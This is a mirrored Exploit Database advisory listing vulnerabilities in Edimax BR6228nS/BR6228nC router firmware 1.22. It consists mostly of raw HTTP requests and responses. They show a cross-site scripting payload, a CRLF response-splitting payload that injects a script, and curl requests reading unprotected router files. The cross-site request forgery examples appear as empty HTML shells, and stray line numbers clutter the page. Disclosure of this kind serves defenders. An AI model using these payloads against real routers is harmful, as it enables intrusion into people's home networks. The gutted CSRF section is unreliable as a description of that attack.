Edimax BR6228nS/BR6228nC – Multiple Vulnerabilities

Exploit Database
127 阅读

作者： smash

日期： 2015-09-01
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/38056/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

# Title: Edimax BR6228nS/BR6228nC - Multiple vulnerabilities

# Date: 01.09.15

# Vendor: edimax.com

# Firmware version: 1.22

# Author: Smash_

# Contact: smash [at] devilteam.pl

Few vulnerabilities found in Edimax BR6228nS/BR6228nC router firmware.

1/ Cross Site Scripting

Request:

POST /goform/formWizSetup HTTP/1.1

Host: 192.168.0.10:8080

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.0.10:8080/main.asp

Cookie: language=0

Authorization: Basic YWRtaW46MTIzNA==

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 33

setPage=x");alert("X&wizEnabled=1

Response:

HTTP/1.0 200 OK

Server: GoAhead-Webs

<html>

2/ HTTP Response Splitting

Request:

POST /goform/formReflashClientTbl HTTP/1.1

Host: 192.168.0.10:8080

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.0.10:8080/stadhcptbl.asp

Cookie: language=0

Authorization: Basic YWRtaW46MTIzNA==

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 163

submit-url=%2Fstadhcptbl.asp%0d%0aXXX%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<script>alert('X')</script>

Response:

HTTP/1.0 302 Redirect

Server: GoAhead-Webs

Date: Fri Nov 16 18:08:51 2012

Pragma: no-cache

Cache-Control: no-cache

Content-Type: text/html

Location: http://192.168.0.10:8080/stadhcptbl.asp

XXX

Content-Length: 0

HTTP/1.1 200 OK

Content-Type: text/html

3/ Cross Site Request Forgery

Examples:

<html>

<body>

</form>

</body>

</html>

<html>

<body>

</form>

</body>

</html>

<html>

<body>

</form>

</body>

</html>

4/ Unprotected files

Following url's can be requested without http authorisation in order to obtain detail informations about router:

http://192.168.0.10:8080/FUNCTION_SCRIPT

http://192.168.0.10:8080/main.asp

Example:

devil@hell:~$ curl -ig http://192.168.0.10:8080/

HTTP/1.1 401 Unauthorized

Server: GoAhead-Webs

Date: Fri Nov 16 18:28:39 2012

WWW-Authenticate: Basic realm="Default: admin/1234"

Pragma: no-cache

Cache-Control: no-cache

Content-Type: text/html

devil@hell:~$ curl -ig http://192.168.0.10:8080/FUNCTION_SCRIPT

HTTP/1.0 200 OK

Date: Fri Nov 16 18:28:47 2012

Server: GoAhead-Webs

Last-modified: Fri Nov 16 09:57:30 2012

Content-length: 997

Content-type: text/html

_DATE_="2012.11.16-17:51:47"

_VERSION_="1.22"

_MODEL_="BR6228GNS"

_MODE_="EdimaxOBM"

_PLATFORM_="RTL8196C_1200"

_HW_LED_WPS_="4"

_HW_LED_POWER_="6"

_HW_LED_WIRELESS_="2"

_HW_LED_USB_="17"

_HW_BUTTON_RESET_="5"

(...)